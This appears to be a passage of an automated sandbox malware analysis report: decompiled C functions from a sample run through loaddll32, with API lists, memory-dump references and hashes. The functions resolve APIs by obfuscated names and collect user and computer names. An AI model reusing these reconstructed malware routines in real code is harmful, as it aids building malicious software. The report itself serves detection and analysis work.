                                                                                                                                                                                                                                    Function 02F98307, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 63%
                                                                                                                                                                                                                                    			E02F98307(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x2f9d27c; // 0x44a5a8
				_t1 = _t9 + 0x2f9e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E02F99401(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E02F92049(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E02F97225(_t34, _t41, _a8);
						E02F99039(_t41);
						_t42 = E02F98E82(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E02F99039(_t36);
							_t36 = _t42;
						}
						_t43 = E02F9788B(_t36, _t33);
						if(_t43 != 0) {
							E02F99039(_t36);
							_t36 = _t43;
						}
					}
					E02F99039(_t28);
				}
				return _t36;
			}














                                                                                                                                                                                                                                    0x02f98307
                                                                                                                                                                                                                                    0x02f9830a
                                                                                                                                                                                                                                    0x02f9830b
                                                                                                                                                                                                                                    0x02f98313
                                                                                                                                                                                                                                    0x02f9831a
                                                                                                                                                                                                                                    0x02f98321
                                                                                                                                                                                                                                    0x02f98325
                                                                                                                                                                                                                                    0x02f9832b
                                                                                                                                                                                                                                    0x02f98332
                                                                                                                                                                                                                                    0x02f98337
                                                                                                                                                                                                                                    0x02f98349
                                                                                                                                                                                                                                    0x02f9834d
                                                                                                                                                                                                                                    0x02f98351
                                                                                                                                                                                                                                    0x02f98357
                                                                                                                                                                                                                                    0x02f9835c
                                                                                                                                                                                                                                    0x02f9836c
                                                                                                                                                                                                                                    0x02f9836e
                                                                                                                                                                                                                                    0x02f98385
                                                                                                                                                                                                                                    0x02f98389
                                                                                                                                                                                                                                    0x02f9838c
                                                                                                                                                                                                                                    0x02f98391
                                                                                                                                                                                                                                    0x02f98391
                                                                                                                                                                                                                                    0x02f9839a
                                                                                                                                                                                                                                    0x02f9839e
                                                                                                                                                                                                                                    0x02f983a1
                                                                                                                                                                                                                                    0x02f983a6
                                                                                                                                                                                                                                    0x02f983a6
                                                                                                                                                                                                                                    0x02f9839e
                                                                                                                                                                                                                                    0x02f983a9
                                                                                                                                                                                                                                    0x02f983a9
                                                                                                                                                                                                                                    0x02f983b4

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 02F99401: lstrlen.KERNEL32(00000000,00000000,00000000,73FCC740,?,?,?,02F98321,253D7325,00000000,00000000,73FCC740,?,?,02F9A428,?), ref: 02F99468
                                                                                                                                                                                                                                      • Part of subcall function 02F99401: sprintf.NTDLL ref: 02F99489
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,73FCC740,?,?,02F9A428,?,033E95B0), ref: 02F98332
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,?,?,02F9A428,?,033E95B0), ref: 02F9833A
                                                                                                                                                                                                                                      • Part of subcall function 02F92049: RtlAllocateHeap.NTDLL(00000000,00000000,02F97E50), ref: 02F92055
                                                                                                                                                                                                                                    • strcpy.NTDLL ref: 02F98351
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 02F9835C
                                                                                                                                                                                                                                      • Part of subcall function 02F97225: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,02F9836B,00000000,?,?,?,02F9A428,?,033E95B0), ref: 02F9723C
                                                                                                                                                                                                                                      • Part of subcall function 02F99039: HeapFree.KERNEL32(00000000,00000000,02F97F18,00000000,?,?,00000000), ref: 02F99045
                                                                                                                                                                                                                                    • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02F9A428,?,033E95B0), ref: 02F98379
                                                                                                                                                                                                                                      • Part of subcall function 02F98E82: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,02F98385,00000000,?,?,02F9A428,?,033E95B0), ref: 02F98E8C
                                                                                                                                                                                                                                      • Part of subcall function 02F98E82: _snprintf.NTDLL ref: 02F98EEA
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                                                                                                                                                                                                    • String ID: =
                                                                                                                                                                                                                                    • API String ID: 2864389247-1428090586
                                                                                                                                                                                                                                    • Opcode ID: 2d7cbf0fb597f97a6fec39a75442b5a09382544056a1529ce1af0d58b704f340
                                                                                                                                                                                                                                    • Instruction ID: c072639e28d478b97a15457f75c01fbc10a30bdd46a8232cb5d723ff5af53813
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d7cbf0fb597f97a6fec39a75442b5a09382544056a1529ce1af0d58b704f340
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8711E373900224A76F127BB59C84C7E769E9F8AAD5706401AF70497200DA75CD025BA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F96CC3, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 02F96D1F
                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(0070006F), ref: 02F96D33
                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 02F96D45
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 02F96DA9
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 02F96DB8
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 02F96DC3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: String$AllocFree
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 344208780-0
                                                                                                                                                                                                                                    • Opcode ID: ef253d975c32e8a733080c0340a3d8e844254fdc8476ed31a93da2040ee1311a
                                                                                                                                                                                                                                    • Instruction ID: c1da6f24be7fc4fa5f9fdf5bb0b26abf0b3096f8298ecc211b2e762def8aac9b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef253d975c32e8a733080c0340a3d8e844254fdc8476ed31a93da2040ee1311a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 94318132D00609AFDF41EFBDC844A9FB7BAAF49344F144466EE15EB120DB71990ACB91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F9692C, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E02F9692C(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E02F92049(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x2f9d27c; // 0x44a5a8
					_t1 = _t23 + 0x2f9e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x2f9d27c; // 0x44a5a8
					_t2 = _t26 + 0x2f9e769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E02F99039(_t54);
					} else {
						_t30 =  *0x2f9d27c; // 0x44a5a8
						_t5 = _t30 + 0x2f9e756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x2f9d27c; // 0x44a5a8
							_t7 = _t33 + 0x2f9e40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x2f9d27c; // 0x44a5a8
								_t9 = _t36 + 0x2f9e4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x2f9d27c; // 0x44a5a8
									_t11 = _t39 + 0x2f9e779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E02F9727B(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                                                                                                                                                                                                                    0x02f9693b
                                                                                                                                                                                                                                    0x02f9693f
                                                                                                                                                                                                                                    0x02f96a01
                                                                                                                                                                                                                                    0x02f96945
                                                                                                                                                                                                                                    0x02f96945
                                                                                                                                                                                                                                    0x02f9694a
                                                                                                                                                                                                                                    0x02f9695d
                                                                                                                                                                                                                                    0x02f9695f
                                                                                                                                                                                                                                    0x02f96964
                                                                                                                                                                                                                                    0x02f9696c
                                                                                                                                                                                                                                    0x02f96973
                                                                                                                                                                                                                                    0x02f96977
                                                                                                                                                                                                                                    0x02f9697a
                                                                                                                                                                                                                                    0x02f969f9
                                                                                                                                                                                                                                    0x02f969fa
                                                                                                                                                                                                                                    0x02f9697c
                                                                                                                                                                                                                                    0x02f9697c
                                                                                                                                                                                                                                    0x02f96981
                                                                                                                                                                                                                                    0x02f96989
                                                                                                                                                                                                                                    0x02f9698d
                                                                                                                                                                                                                                    0x02f96990
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f96992
                                                                                                                                                                                                                                    0x02f96992
                                                                                                                                                                                                                                    0x02f96997
                                                                                                                                                                                                                                    0x02f9699f
                                                                                                                                                                                                                                    0x02f969a3
                                                                                                                                                                                                                                    0x02f969a6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f969a8
                                                                                                                                                                                                                                    0x02f969a8
                                                                                                                                                                                                                                    0x02f969ad
                                                                                                                                                                                                                                    0x02f969b5
                                                                                                                                                                                                                                    0x02f969b9
                                                                                                                                                                                                                                    0x02f969bc
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f969be
                                                                                                                                                                                                                                    0x02f969be
                                                                                                                                                                                                                                    0x02f969c3
                                                                                                                                                                                                                                    0x02f969cb
                                                                                                                                                                                                                                    0x02f969cf
                                                                                                                                                                                                                                    0x02f969d2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f969d4
                                                                                                                                                                                                                                    0x02f969da
                                                                                                                                                                                                                                    0x02f969df
                                                                                                                                                                                                                                    0x02f969e6
                                                                                                                                                                                                                                    0x02f969ed
                                                                                                                                                                                                                                    0x02f969f0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f969f2
                                                                                                                                                                                                                                    0x02f969f5
                                                                                                                                                                                                                                    0x02f969f5
                                                                                                                                                                                                                                    0x02f969f0
                                                                                                                                                                                                                                    0x02f969d2
                                                                                                                                                                                                                                    0x02f969bc
                                                                                                                                                                                                                                    0x02f969a6
                                                                                                                                                                                                                                    0x02f96990
                                                                                                                                                                                                                                    0x02f9697a
                                                                                                                                                                                                                                    0x02f96a0f

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 02F92049: RtlAllocateHeap.NTDLL(00000000,00000000,02F97E50), ref: 02F92055
                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02F9207A,?,00000001,?,?,00000000,00000000), ref: 02F96951
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,7243775A), ref: 02F96973
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,614D775A), ref: 02F96989
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02F9699F
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02F969B5
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02F969CB
                                                                                                                                                                                                                                      • Part of subcall function 02F9727B: memset.NTDLL ref: 02F972FA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProc$AllocateHandleHeapModulememset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1886625739-0
                                                                                                                                                                                                                                    • Opcode ID: b52df87f6e06551d09b3c1c6a35b3eb27b3318de802303432635e0254818f3ea
                                                                                                                                                                                                                                    • Instruction ID: 6177ca099b794c7c8bd17d427917270a94993dcb5c6ad9e7c8af476b56fc2b6f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b52df87f6e06551d09b3c1c6a35b3eb27b3318de802303432635e0254818f3ea
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D212FB1A4120ADFEB20DFAED844E5A77ECEB097C4702452AE615C7200E735E9058F60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F97649, Relevance: 7.6, APIs: 5, Instructions: 81COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E02F97649() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t63;
				short* _t66;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t63 = E02F92049(_v12 + _t43 + 2 << 2);
						if(_t63 != 0) {
							_t47 = _v12;
							_t66 = _t63 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t66,  &_v8) == 0) {
								L7:
								E02F99039(_t63);
							} else {
								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x2f9a33a
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t63[_t57] = 0;
										_v16 = _t63;
									}
								}
							}
						}
					}
				}
				return _v16;
			}














                                                                                                                                                                                                                                    0x02f97657
                                                                                                                                                                                                                                    0x02f9765a
                                                                                                                                                                                                                                    0x02f9765d
                                                                                                                                                                                                                                    0x02f97663
                                                                                                                                                                                                                                    0x02f97668
                                                                                                                                                                                                                                    0x02f9766e
                                                                                                                                                                                                                                    0x02f97676
                                                                                                                                                                                                                                    0x02f97679
                                                                                                                                                                                                                                    0x02f9767f
                                                                                                                                                                                                                                    0x02f97684
                                                                                                                                                                                                                                    0x02f97691
                                                                                                                                                                                                                                    0x02f9769e
                                                                                                                                                                                                                                    0x02f976a2
                                                                                                                                                                                                                                    0x02f976a4
                                                                                                                                                                                                                                    0x02f976a8
                                                                                                                                                                                                                                    0x02f976ab
                                                                                                                                                                                                                                    0x02f976bb
                                                                                                                                                                                                                                    0x02f9770d
                                                                                                                                                                                                                                    0x02f9770e
                                                                                                                                                                                                                                    0x02f976bd
                                                                                                                                                                                                                                    0x02f976c0
                                                                                                                                                                                                                                    0x02f976c7
                                                                                                                                                                                                                                    0x02f976ca
                                                                                                                                                                                                                                    0x02f976dd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f976df
                                                                                                                                                                                                                                    0x02f976e2
                                                                                                                                                                                                                                    0x02f976e7
                                                                                                                                                                                                                                    0x02f976f5
                                                                                                                                                                                                                                    0x02f976f8
                                                                                                                                                                                                                                    0x02f97700
                                                                                                                                                                                                                                    0x02f97703
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f97705
                                                                                                                                                                                                                                    0x02f97705
                                                                                                                                                                                                                                    0x02f97708
                                                                                                                                                                                                                                    0x02f97708
                                                                                                                                                                                                                                    0x02f97703
                                                                                                                                                                                                                                    0x02f976dd
                                                                                                                                                                                                                                    0x02f97713
                                                                                                                                                                                                                                    0x02f97714
                                                                                                                                                                                                                                    0x02f97684
                                                                                                                                                                                                                                    0x02f9771a

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetUserNameW.ADVAPI32(00000000,02F9A338), ref: 02F9765D
                                                                                                                                                                                                                                    • GetComputerNameW.KERNEL32(00000000,02F9A338), ref: 02F97679
                                                                                                                                                                                                                                      • Part of subcall function 02F92049: RtlAllocateHeap.NTDLL(00000000,00000000,02F97E50), ref: 02F92055
                                                                                                                                                                                                                                    • GetUserNameW.ADVAPI32(00000000,02F9A338), ref: 02F976B3
                                                                                                                                                                                                                                    • GetComputerNameW.KERNEL32(02F9A338,?), ref: 02F976D5
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,02F9A338,00000000,02F9A33A,00000000,00000000,?,?,02F9A338), ref: 02F976F8
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3850880919-0
                                                                                                                                                                                                                                    • Opcode ID: a499c500296d791073d0248f59537c8a5875d3ddd779b25751c740f629939241
                                                                                                                                                                                                                                    • Instruction ID: 5935e887fff376c7e844399e777df5b08d80e1a5e743383e0f827d6a2faea69d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a499c500296d791073d0248f59537c8a5875d3ddd779b25751c740f629939241
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6921D9B6D1020CFBDB11DFA9D985CEEFBB8EE44384B5044AAE601E7210D731AB44DB61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F91585, Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                                                    			E02F91585(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E02F97F27(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E02F9A9AB(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x2f9d130() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                                                                                                                                                                                                                                    0x02f91585
                                                                                                                                                                                                                                    0x02f91592
                                                                                                                                                                                                                                    0x02f91594
                                                                                                                                                                                                                                    0x02f915f7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f915f7
                                                                                                                                                                                                                                    0x02f915ac
                                                                                                                                                                                                                                    0x02f915b3
                                                                                                                                                                                                                                    0x02f915bf
                                                                                                                                                                                                                                    0x02f915c4
                                                                                                                                                                                                                                    0x02f915c6
                                                                                                                                                                                                                                    0x02f915c8
                                                                                                                                                                                                                                    0x02f915ca
                                                                                                                                                                                                                                    0x02f915cc
                                                                                                                                                                                                                                    0x02f915ce
                                                                                                                                                                                                                                    0x02f915da
                                                                                                                                                                                                                                    0x02f915ea
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f915dc
                                                                                                                                                                                                                                    0x02f915dc
                                                                                                                                                                                                                                    0x02f915e3
                                                                                                                                                                                                                                    0x02f915f0
                                                                                                                                                                                                                                    0x02f915f0
                                                                                                                                                                                                                                    0x02f915f0
                                                                                                                                                                                                                                    0x02f915e3
                                                                                                                                                                                                                                    0x02f915da
                                                                                                                                                                                                                                    0x02f915f5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f915fb

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ResetEvent.KERNEL32(?,00000008,?,?,00000102,02F911DA,?,?,00000000,00000000), ref: 02F915BF
                                                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 02F915C4
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02F915DC
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000102,02F911DA,?,?,00000000,00000000), ref: 02F915F7
                                                                                                                                                                                                                                      • Part of subcall function 02F97F27: lstrlen.KERNEL32(00000000,00000008,?,76D24D40,?,?,02F915A4,?,?,?,?,00000102,02F911DA,?,?,00000000), ref: 02F97F33
                                                                                                                                                                                                                                      • Part of subcall function 02F97F27: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02F915A4,?,?,?,?,00000102,02F911DA,?), ref: 02F97F91
                                                                                                                                                                                                                                      • Part of subcall function 02F97F27: lstrcpy.KERNEL32(00000000,00000000), ref: 02F97FA1
                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 02F915EA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1449191863-0
                                                                                                                                                                                                                                    • Opcode ID: 599cdc026220c54e226c57c3d4e3c0fad923a2c0f77da6cc55b34f33e6916d01
                                                                                                                                                                                                                                    • Instruction ID: 63ec3b329c7add2aeff030e79a5e8da00d70fc599bffdab02a9f7b75a0a65311
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 599cdc026220c54e226c57c3d4e3c0fad923a2c0f77da6cc55b34f33e6916d01
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E701A2319402026BFF316B22DC44B1BB6A9FF447E4F114A35F25AD12F0DB20D814DA10
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F98F10, Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E02F98F10(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t13;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x2f9d26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t13 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x2f9d25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x2f9d258 = _t6;
					 *0x2f9d264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x2f9d254 = _t7;
					if(_t7 == 0) {
						 *0x2f9d254 =  *0x2f9d254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 > 0) {
					goto L5;
				}
				_t13 = _t4 - _t4;
				goto L4;
			}









                                                                                                                                                                                                                                    0x02f98f18
                                                                                                                                                                                                                                    0x02f98f20
                                                                                                                                                                                                                                    0x02f98f25
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f98f7a
                                                                                                                                                                                                                                    0x02f98f27
                                                                                                                                                                                                                                    0x02f98f2f
                                                                                                                                                                                                                                    0x02f98f37
                                                                                                                                                                                                                                    0x02f98f37
                                                                                                                                                                                                                                    0x02f98f77
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f98f77
                                                                                                                                                                                                                                    0x02f98f39
                                                                                                                                                                                                                                    0x02f98f39
                                                                                                                                                                                                                                    0x02f98f3e
                                                                                                                                                                                                                                    0x02f98f50
                                                                                                                                                                                                                                    0x02f98f55
